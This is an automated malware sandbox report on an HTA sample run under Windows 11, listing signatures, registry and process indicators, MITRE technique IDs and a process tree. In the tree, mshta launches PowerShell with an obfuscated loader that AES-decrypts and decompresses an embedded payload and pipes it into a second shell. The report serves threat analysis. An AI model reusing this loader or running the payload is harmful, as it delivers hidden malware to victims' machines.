3766909a3b3c677906005b3106a0bf284895b645bac0b5abd171415fd10ad6ea

Analysis

max time kernel
229s
max time network
228s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
30/04/2024, 13:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddc01382517e8750138222a89459494be8d4147db96622dfd2d5a45aee0d939b.hta
Size

79KB
MD5

68319d7c105081872e1482f9aaa5a4fd
SHA1

05f2351a47786e86a09c05c0d42243af9cde1a3a
SHA256

ddc01382517e8750138222a89459494be8d4147db96622dfd2d5a45aee0d939b
SHA512

3f6b3d2fe8c1a0f90a535bbd546377e8a5ada1782979e7b8428fa726877dd26a939fa76a552809455c59dc415e038bb0f573dbd11f5b17a1f28ec57db2e814dd
SSDEEP

768:JWJ9KMSSW2vTls7F3Y5c2dMGMYJV7/s1G:QfvFcaMYJi1G

Score

4^/10

Malware Config

Signatures

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133589564151715984"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1260	powershell.exe
1260	powershell.exe
2288	powershell.exe
2288	powershell.exe
4108	chrome.exe
4108	chrome.exe
2688	chrome.exe
2688	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	4108	chrome.exe
Token: SeCreatePagefilePrivilege	4108	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe
Token: SeShutdownPrivilege	2688	chrome.exe
Token: SeCreatePagefilePrivilege	2688	chrome.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
4108	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 472 wrote to memory of 1260	472	mshta.exe	79
PID 472 wrote to memory of 1260	472	mshta.exe	79
PID 472 wrote to memory of 1260	472	mshta.exe	79
PID 1260 wrote to memory of 2288	1260	powershell.exe	82
PID 1260 wrote to memory of 2288	1260	powershell.exe	82
PID 1260 wrote to memory of 2288	1260	powershell.exe	82
PID 4108 wrote to memory of 4624	4108	chrome.exe	88
PID 4108 wrote to memory of 4624	4108	chrome.exe	88
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 1604	4108	chrome.exe	89
PID 4108 wrote to memory of 2768	4108	chrome.exe	90
PID 4108 wrote to memory of 2768	4108	chrome.exe	90
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91
PID 4108 wrote to memory of 3284	4108	chrome.exe	91

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ddc01382517e8750138222a89459494be8d4147db96622dfd2d5a45aee0d939b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Suspicious use of WriteProcessMemory
PID:472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ZagRhv = 'AAAAAAAAAAAAAAAAAAAAALDU1Uf+qJOSHbKLca6CUgnRENNOEFtBL2vnZEndKi/qz4tXTKHkfCsS/psaEsL/HzwHg1ag9mZ5fvywcgJv68ld2aUOfHNULgQGJP2hp7yOm78U73BxMRsdEkQq6l7vgyFbCTkr1sBi8+Tl7bc/NPovh2N/ncUxz8vrZsZuYbN/KnO/+vuKiszS9QcW6ptsR65xAZvaX4T5l6xlHnO/F6gxLbwPK6vZFR+5A0RSxvw0jqMsK2lO2SrR28c7bH3bC/gY1OLNmMPbTB3SQp25/O0C4iP/5F/QF/PcHRMjDn7PL1+8gapvC6mh5rHRc03iaK1Z5UzEdUOHi6qfaCT7EiuCycY2SdcyXPthltgTpqwt/HROVu6gHCL5bCI1RbCDbSgcIEvA+jFzgjE8ekog7uAQO50D9uf4+dZyKCfmQ/OgEj+VTc3U9Lt7UTj0WbdDXChv8V226ybxEJkNzYiyW6dWwUXEbAUYnAQZFAPyvXqNskuKHB44AhA4AK7IQ6oW3Hfy17tlAoTBDJCew0wC3pfUs25opsJoi+WxTi1rWJL1DXlwpQtfga7vtI10xSu3aaYuI5y+pKGGfcYwfQSGmJlgEXWxtNwmH4NPU5AJ391hNWPzD8qDYirQJUvKAZZkcWuK0fBHXMpdszyK0UdHEqCMFoVXS75IXaqq85EKTyTFYxc+JMhOc1n9S12ctL83Lp3K0w/2IPhBxb/d3lghdsN5C0DYW+BlHH9IlacdfuwKsepxckQ8S1pZqIe9E5q9q2N6ny3j9oqWJpFIyYOekgORSB3Psbl+tIbzFYoscgHcCq1oAT48GJGr6nQyb2oCRG5SrY0azW0A3BEbvs0PVj36PBXyDn1mFshC7cfi+9pK';$xOhLNYBG = 'bW9YVmlQU3JvcHFaT2F3UmRuT2FkQUZoRmN3T0FkUk8=';$qIomOa = New-Object 'System.Security.Cryptography.AesManaged';$qIomOa.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qIomOa.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qIomOa.BlockSize = 128;$qIomOa.KeySize = 256;$qIomOa.Key = [System.Convert]::FromBase64String($xOhLNYBG);$aCppL = [System.Convert]::FromBase64String($ZagRhv);$KoRVSiKe = $aCppL[0..15];$qIomOa.IV = $KoRVSiKe;$JJtSUCAzO = $qIomOa.CreateDecryptor();$AxtHYKRtw = $JJtSUCAzO.TransformFinalBlock($aCppL, 16, $aCppL.Length - 16);$qIomOa.Dispose();$kIKzy = New-Object System.IO.MemoryStream( , $AxtHYKRtw );$lSFXR = New-Object System.IO.MemoryStream;$OOOklPaPA = New-Object System.IO.Compression.GzipStream $kIKzy, ([IO.Compression.CompressionMode]::Decompress);$OOOklPaPA.CopyTo( $lSFXR );$OOOklPaPA.Close();$kIKzy.Close();[byte[]] $vEzGruo = $lSFXR.ToArray();$pUSldAb = [System.Text.Encoding]::UTF8.GetString($vEzGruo);$pUSldAb | powershell -
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2288

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7cc9cc40,0x7ffb7cc9cc4c,0x7ffb7cc9cc58
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1788,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1784 /prefetch:2
  2⤵
  PID:1604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2116 /prefetch:3
  2⤵
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2204 /prefetch:8
  2⤵
  PID:3284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4464,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4472 /prefetch:1
  2⤵
  PID:1292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4676,i,11680530465584709466,6475216444436266013,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4828 /prefetch:8
  2⤵
  PID:2980

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:1704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7cc9cc40,0x7ffb7cc9cc4c,0x7ffb7cc9cc58
  2⤵
  PID:4208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1932 /prefetch:2
  2⤵
  PID:760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1704,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2068 /prefetch:3
  2⤵
  PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2200 /prefetch:8
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3544 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4720,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4732 /prefetch:8
  2⤵
  PID:3016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5036,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1172 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5108,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4972 /prefetch:1
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5024,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5164,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:3744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5256,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:2668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5320,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4284 /prefetch:1
  2⤵
  PID:3228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5096,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4896 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4900,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=872 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4344,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:4072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5004,i,7059506579977207135,14297102084826830717,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3720 /prefetch:1
  2⤵
  PID:472
- C:\Program Files\Google\Chrome\Application\chrome.exe
